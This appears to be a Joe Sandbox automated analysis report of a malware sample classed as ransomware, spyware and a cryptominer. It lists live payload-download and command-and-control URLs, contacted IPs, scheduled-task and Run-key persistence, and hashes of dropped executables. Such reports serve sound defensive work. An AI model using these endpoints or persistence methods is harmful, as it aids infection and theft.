                                                                                                                                                                                              https://frostman.shop;Dry.com, 0000002C.00000002.3802571549.000000000077C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000064C000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://html4/loose.dtdea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://t.me/Dry.com, 0000002C.00000002.3807607263.00000000019D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://31.41.244.11/files/wicked/random.exeskotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://ocsp.sectigo.com0skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                        https://web.telegram.orgDry.com, 0000002C.00000002.3807607263.0000000001A1D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000061D000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://t.mDry.com, 0000002C.00000003.3133365512.000000000194F000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133312645.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133856971.00000000019EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://docs.rs/getrandom#nodejs-es-module-supportrandom[2].exe0.5.drfalse
                                                                                                                                                                                                                http://ocsps.ssl.com03dd71a48b2.exe.5.drfalse
                                                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                                      http://.cssea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://t.me/k04aelGI)Dry.com, 0000002C.00000002.3812151194.0000000004180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://pancakedipyps.click:443/api4fa7efe79d.exe, 00000031.00000003.3251773501.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3251883939.00000000010F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl03dd71a48b2.exe.5.drfalse
                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                                                http://x1.c.lencr.org/04fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://x1.i.lencr.org/04fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://www.ssl.com/repository03dd71a48b2.exe.5.drfalse
                                                                                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.all4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          http://.jpgea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://frostman.shopDry.com, 0000002C.00000002.3802571549.000000000061D000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://sectigo.com/CPS0skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoDry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  https://curl.se/docs/http-cookies.htmlea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    https://xmrig.com/wizard%sIntel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaDry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          https://ac.ecosia.org/autocomplete?q=Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgDry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgDry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  https://discokeyus.lat/db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      https://xmrig.com/docs/algorithmsIntel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        http://usbtor.ru/viewtopic.php?t=798)Zf0aeaa9386.exe, 00000006.00000000.2834563596.0000000000423000.00000002.00000001.01000000.00000009.sdmp, f0aeaa9386.exe, 00000006.00000003.2837509672.0000000002471000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                          185.215.113.43
                                                                                                                                                                                                                                                                          		unknownPortugal
                                                                                                                                                                                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                                          185.121.15.192
                                                                                                                                                                                                                                                                          		fivetk5ht.topSpain
                                                                                                                                                                                                                                                                          		207046REDSERVICIOEStrue
                                                                                                                                                                                                                                                                          98.85.100.80
                                                                                                                                                                                                                                                                          		httpbin.orgUnited States
                                                                                                                                                                                                                                                                          		11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                                          172.67.180.113
                                                                                                                                                                                                                                                                          		treehoneyi.clickUnited States
                                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          104.21.23.76
                                                                                                                                                                                                                                                                          		pancakedipyps.clickUnited States
                                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          185.215.113.16
                                                                                                                                                                                                                                                                          		unknownPortugal
                                                                                                                                                                                                                                                                          		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                                          116.203.12.114
                                                                                                                                                                                                                                                                          		frostman.shopGermany
                                                                                                                                                                                                                                                                          		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                                          149.154.167.99
                                                                                                                                                                                                                                                                          		t.meUnited Kingdom
                                                                                                                                                                                                                                                                          		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                                          172.67.197.170
                                                                                                                                                                                                                                                                          		discokeyus.latUnited States
                                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          31.41.244.11
                                                                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                                                                          		61974AEROEXPRESS-ASRUfalse
                                                                                                                                                                                                                                                                          127.1.10.1
                                                                                                                                                                                                                                                                          		unknownunknown
                                                                                                                                                                                                                                                                          		unknownunknowntrue

                                                                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                          Analysis ID:1579182
                                                                                                                                                                                                                                                                          Start date and time:2024-12-21 01:12:08 +01:00
                                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                          Overall analysis duration:0h 20m 42s
                                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:56
                                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                                          Sample name:file.exe
                                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                                          Classification:mal100.rans.troj.spyw.evad.mine.winEXE@108/68@52/12
                                                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                                                          • Successful, ratio: 62.5%
                                                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                                                          • Successful, ratio: 55%
                                                                                                                                                                                                                                                                          • Number of executed functions: 165
                                                                                                                                                                                                                                                                          • Number of non-executed functions: 233
                                                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                                                                          • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.17.78, 64.233.162.84, 172.217.17.46, 172.217.17.67, 142.250.181.10, 142.250.181.106, 172.217.17.42, 172.217.19.202, 172.217.19.10, 142.250.181.138, 172.217.21.42, 172.217.19.234, 172.217.17.74, 142.250.181.74, 204.79.197.203, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 172.165.61.93, 88.221.134.17, 88.221.135.81, 2.16.158.96, 2.16.158.192, 2.16.158.27, 2.16.158.35, 2.16.158.169, 23.212.89.176, 13.87.96.169, 184.28.88.27, 142.250.181.99, 172.217.19.206, 64.233.164.84, 13.107.246.63, 172.202.163.200, 184.28.90.27, 94.245.104.56, 40.126.53.11, 4.153.29.52, 23.198.214.144, 20.42.73.29, 20.189.173.22, 13.69.116.109
                                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, spocs.getpocket.com, e19240.d.akamaiedge.net, clientservices.googleapis.com, aus5.mozilla.org, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, us-west1.prod.sumo.prod.webservices.mozgcp.net, login.live.com, ipv4only.arpa, config-edge-skype.l-0007.l-msedge.net, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, www.youtube.com, www.gstatic.com, l-0007.l-msedge.net, star-mini.c10r.facebook.com, www.bing.com, prod.balrog.prod.cloudops.mozgcp.net, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, staticview.msn.com.edgekey.net, detectportal.firefox.com, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, dyna.wikimedia.org, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, youtube-ui.l.
                                                                                                                                                                                                                                                                          • Execution Graph export aborted for target explorer.exe, PID 5284 because there are no executed function
                                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                                                          01:13:05Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          01:14:24Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                                          01:15:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 7278b2c5ac.exe C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe
                                                                                                                                                                                                                                                                          01:16:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1742fccc73.exe C:\Users\user\AppData\Local\Temp\1018978001\1742fccc73.exe
                                                                                                                                                                                                                                                                          01:16:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adcff63ffe.exe C:\Users\user\AppData\Local\Temp\1018979001\adcff63ffe.exe
                                                                                                                                                                                                                                                                          01:16:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c48ca243d4.exe C:\Users\user\AppData\Local\Temp\1018980001\c48ca243d4.exe
                                                                                                                                                                                                                                                                          01:16:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 7278b2c5ac.exe C:\Users\user\AppData\Local\Temp\1018977001\7278b2c5ac.exe
                                                                                                                                                                                                                                                                          01:16:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1742fccc73.exe C:\Users\user\AppData\Local\Temp\1018978001\1742fccc73.exe
                                                                                                                                                                                                                                                                          01:16:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adcff63ffe.exe C:\Users\user\AppData\Local\Temp\1018979001\adcff63ffe.exe
                                                                                                                                                                                                                                                                          01:16:51Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                          01:16:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c48ca243d4.exe C:\Users\user\AppData\Local\Temp\1018980001\c48ca243d4.exe
                                                                                                                                                                                                                                                                          19:14:01API Interceptor22044657x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                                          19:14:25API Interceptor1x Sleep call for process: 3dd71a48b2.exe modified
                                                                                                                                                                                                                                                                          19:14:29API Interceptor22x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                          19:14:34API Interceptor4x Sleep call for process: db77c3e215.exe modified
                                                                                                                                                                                                                                                                          19:14:45API Interceptor8x Sleep call for process: 4fa7efe79d.exe modified
                                                                                                                                                                                                                                                                          19:15:10API Interceptor2x Sleep call for process: 3f5e6ed253.exe modified
                                                                                                                                                                                                                                                                          19:15:25API Interceptor1043792x Sleep call for process: ea2827841c.exe modified

                                                                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1863680
                                                                                                                                                                                                                                                                          Entropy (8bit):7.947727721324286
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
                                                                                                                                                                                                                                                                          MD5:27C1F96D7E1B72B6817B6EFEFF037F90
                                                                                                                                                                                                                                                                          SHA1:2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
                                                                                                                                                                                                                                                                          SHA-256:AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
                                                                                                                                                                                                                                                                          SHA-512:9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1114112
                                                                                                                                                                                                                                                                          Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                                                          MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                                                          SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                                                          SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                                                          SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):863093
                                                                                                                                                                                                                                                                          Entropy (8bit):7.96744840145825
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
                                                                                                                                                                                                                                                                          MD5:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                                          SHA1:0E64D77EF1B917B3AFE512B49710250C71369175
                                                                                                                                                                                                                                                                          SHA-256:B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
                                                                                                                                                                                                                                                                          SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1374720
                                                                                                                                                                                                                                                                          Entropy (8bit):7.0671827674657335
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
